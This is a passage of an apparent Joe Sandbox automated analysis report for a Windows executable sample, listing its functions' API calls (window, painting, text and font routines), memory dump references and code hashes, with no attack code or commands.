UnregisterClassA.USER32(00421DB4,00400000), ref: 00421E0E
RegisterClassA.USER32(0049E5BC), ref: 00421E18
SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 00421E53

Strings

$CA, xrefs: 00421DF9

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID: $CA
API String ID: 4025006896-445274862
Opcode ID: 838b1e159a7a339314fb54ab1241634f066a2071571da97e735cb94c0c437a43
Instruction ID: 6d2c5924520980691d7fbd174f6a89073267f051d34a0ee7e814a36d4876b217
Opcode Fuzzy Hash: 838b1e159a7a339314fb54ab1241634f066a2071571da97e735cb94c0c437a43
Instruction Fuzzy Hash: B7015271744108BBCB10EBA9EC81F6B3798E719314B45463AF904E72F1E6359C008F6D

Function 00437F58 Relevance: 7.6, APIs: 5, Instructions: 137COMMON

Download Yara Rule

APIs

ScrollWindowEx.USER32(00000000,?,00000000,?,?,00000000,00000000,00000002), ref: 00437FB3
ScrollWindowEx.USER32(00000000,00000000,00000000,?,?,00000000,00000000,00000002), ref: 00437FF3
ScrollWindowEx.USER32(00000000,00000000,00000000,?,?,00000000,00000000,00000002), ref: 0043802D
ScrollWindowEx.USER32(00000000,00000000,00000000,?,?,00000000,00000000,00000002), ref: 00438062
ScrollWindowEx.USER32(00000000,00000000,00000000,?,?,00000000,00000000,00000002), ref: 0043809A

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: ScrollWindow
String ID:
API String ID: 2126015319-0
Opcode ID: 89005a46a6798e04da229ecabbb4486ef42276c13870c7d64359e23d9d787bc4
Instruction ID: f1e0ee05a2463226eb4ca8eb6ccbbd4c48015c853a7ac9b9bceba4b5fba5452c
Opcode Fuzzy Hash: 89005a46a6798e04da229ecabbb4486ef42276c13870c7d64359e23d9d787bc4
Instruction Fuzzy Hash: 6041EC72A40108ABDB50DA95CCC2FDFB7BCAF48704F504466B605EB282DA74E981CBA4

Function 00417494 Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

BeginPaint.USER32(00000000,?), ref: 004174BA
SaveDC.GDI32(?), ref: 004174EB
ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,004175AD), ref: 0041754C
RestoreDC.GDI32(?,?), ref: 00417573
EndPaint.USER32(00000000,?,004175B4,00000000,004175AD), ref: 004175A7

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: f3595bc3c8a7d7867ce3c11287199c359b143537a1b1a32934062bf64fc4a0d9
Instruction ID: 7455483999083baaa824a4aa2044f9b456a9cf5b3ce45a4e49caa6c658f2d9be
Opcode Fuzzy Hash: f3595bc3c8a7d7867ce3c11287199c359b143537a1b1a32934062bf64fc4a0d9
Instruction Fuzzy Hash: BC413D70A04204AFCB14DBA9C985FAEBBF9EF48314F1540AAE4059B762D7789D81CB18

Function 004150AC Relevance: 7.6, APIs: 5, Instructions: 102COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,?), ref: 004150E2
MulDiv.KERNEL32(?,?,?), ref: 004150FC
MulDiv.KERNEL32(?,?,?), ref: 00415125
MulDiv.KERNEL32(?,?,?), ref: 00415150
MulDiv.KERNEL32(00000000,?,00000000), ref: 00415198

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82e476731d00b39d79cb6b7b7f6944893db741345cbf7a1c8a71c55aabc3b21d
Instruction ID: d7e107ea37b472974044fc10213b4a98414b5799e3370bb5e741b758789e6974
Opcode Fuzzy Hash: 82e476731d00b39d79cb6b7b7f6944893db741345cbf7a1c8a71c55aabc3b21d
Instruction Fuzzy Hash: 8E312E70604B40EFC321DA69C984BEBBBE8AF89714F08891EB9D5C7751C678E8808B55

Function 0042F48C Relevance: 7.6, APIs: 5, Instructions: 102COMMON

Download Yara Rule

APIs

73E9A570.USER32(00000000), ref: 0042F4B4

Part of subcall function 0041BAC8: CreateFontIndirectA.GDI32(?), ref: 0041BB87

SelectObject.GDI32(00000000,00000000), ref: 0042F4C5
GetTextMetricsA.GDI32(00000000,?), ref: 0042F4D2
SelectObject.GDI32(00000000,00000000), ref: 0042F4D9
73E9A480.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042F4E1

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: ObjectSelect$A480A570CreateFontIndirectMetricsText
String ID:
API String ID: 3444835428-0
Opcode ID: 145ea263891aa285be4bb03775c4c7fce946c7a04e459737d6e4c2e3297a82b7
Instruction ID: e0f86c7d638f3f54ef5e6037fb390d51c6638a4faff9cd725954fb0becae061c
Opcode Fuzzy Hash: 145ea263891aa285be4bb03775c4c7fce946c7a04e459737d6e4c2e3297a82b7
Instruction Fuzzy Hash: 383145B1605700AFC304DF6AD881B5BB7E9EB88314F44993EF499C7352C674AC488B5A

Function 0041D418 Relevance: 7.6, APIs: 5, Instructions: 83COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 0041D42A
GetSystemMetrics.USER32(0000000C), ref: 0041D434
73E9A570.USER32(00000000,00000001,0000000C,0000000B), ref: 0041D472
73EA6310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041D5DD,?,00000000,00000001,0000000C,0000000B), ref: 0041D4B9
DeleteObject.GDI32(00000000), ref: 0041D4FA

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: MetricsSystem$A570A6310DeleteObject
String ID:
API String ID: 3435189566-0
Opcode ID: acc4518e7d161de0b7ded15aa9f519b394b3d949a575b466fcc7b3465f807214
Instruction ID: a8c6a9346fe967f63b8d46105c67df1b0efb6b93838696cf80032cd4c1501524
Opcode Fuzzy Hash: acc4518e7d161de0b7ded15aa9f519b394b3d949a575b466fcc7b3465f807214
Instruction Fuzzy Hash: BC314174E00608EFDB04DFA5C982AAEB7F5FB48704F11856AF504AB381D6789E80DF58

Function 004458F8 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 0044592C
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0044595E
OffsetRect.USER32(?,000000FF,000000FF), ref: 0044596B
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 00445994
DrawTextA.USER32(00000000,00000000,00000000,?,00000025), ref: 004459B9

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: DrawText$OffsetRect
String ID:
API String ID: 1886049697-0
Opcode ID: 41530dd8865d90a375d84b9b0352c019fa3ee3994b484ae9724f9bcf2a487016
Instruction ID: 3591cb28eee24cf3d5c0ad88116bea35030cd71bcdea0d9b8c79d9df368f0cd2
Opcode Fuzzy Hash: 41530dd8865d90a375d84b9b0352c019fa3ee3994b484ae9724f9bcf2a487016
Instruction Fuzzy Hash: 7311A7B174051467DB00FA6E8C81AAF639CDF04729F04053BB514F72C2CA78D904436D

Function 00403BF4 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400,?,?,?,00000000,00403DDC,?,?,00403E38), ref: 00403C2E
SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403C39
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,00000000,00403DDC,?,?,00403E38), ref: 00403C4C
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403C56
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00403C65

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: 98fff1bcf86a8df4ebaa0bfbefcb67eb7d48ad029321b9d0b65fed84146d1344
Instruction ID: d910f1e5612db93a6d501385042a0ae01b0530d16664e467673581f83e94ef85
Opcode Fuzzy Hash: 98fff1bcf86a8df4ebaa0bfbefcb67eb7d48ad029321b9d0b65fed84146d1344
Instruction Fuzzy Hash: C7F044953842943AF550B5A64C87FA7198CCB41B6EF10047FB704FA1D1D8789D04827D

Function 00414C8C Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

73E98830.GDI32(00000000,00000000,00000000), ref: 00414CC5
73E922A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414CCD
73E98830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414CE1
73E922A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414CE7
73E9A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414CF2

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: E922E98830$A480
String ID:
API String ID: 3692852386-0
Opcode ID: 8611d22e81993a2e0a68f94b314f6b0e1e198edb62fb2434ded30f4a07c946d5
Instruction ID: 1cf4e21fb881e4ae353a4ebe20f5da57a096e383ffc27348d011089c8309c7ac
Opcode Fuzzy Hash: 8611d22e81993a2e0a68f94b314f6b0e1e198edb62fb2434ded30f4a07c946d5
Instruction Fuzzy Hash: 0501DF712087406AD200B63D8C45A9F7BDC9FDA314F0508AEF494EB282DA7ACC018BA5

Function 00438C80 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

@, xrefs: 00438CE9

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: e16d4dac7e3a0647c0acb0a058a14d3dd14d134d111d499ef6f570c3af6bd35a
Instruction ID: bd8826c1b9ca3a94210ef8b062247da00dc37cbdd390a40118853eaf19bea6cc
Opcode Fuzzy Hash: e16d4dac7e3a0647c0acb0a058a14d3dd14d134d111d499ef6f570c3af6bd35a
Instruction Fuzzy Hash: E9A12B30A04248EFDB11DB99C985BDEF7B6EF49304F2451AAF404AB352CB74AE40DB54

Function 0048A018 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

OemToCharA.USER32(?,?), ref: 0048A0F1

Strings

PASSWORD, xrefs: 0048A203, 0048A272
USER NAME, xrefs: 0048A181, 0048A19B, 0048A1B7, 0048A1D1, 0048A1E4, 0048A223, 0048A23D
STANDARD, xrefs: 0048A13B

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
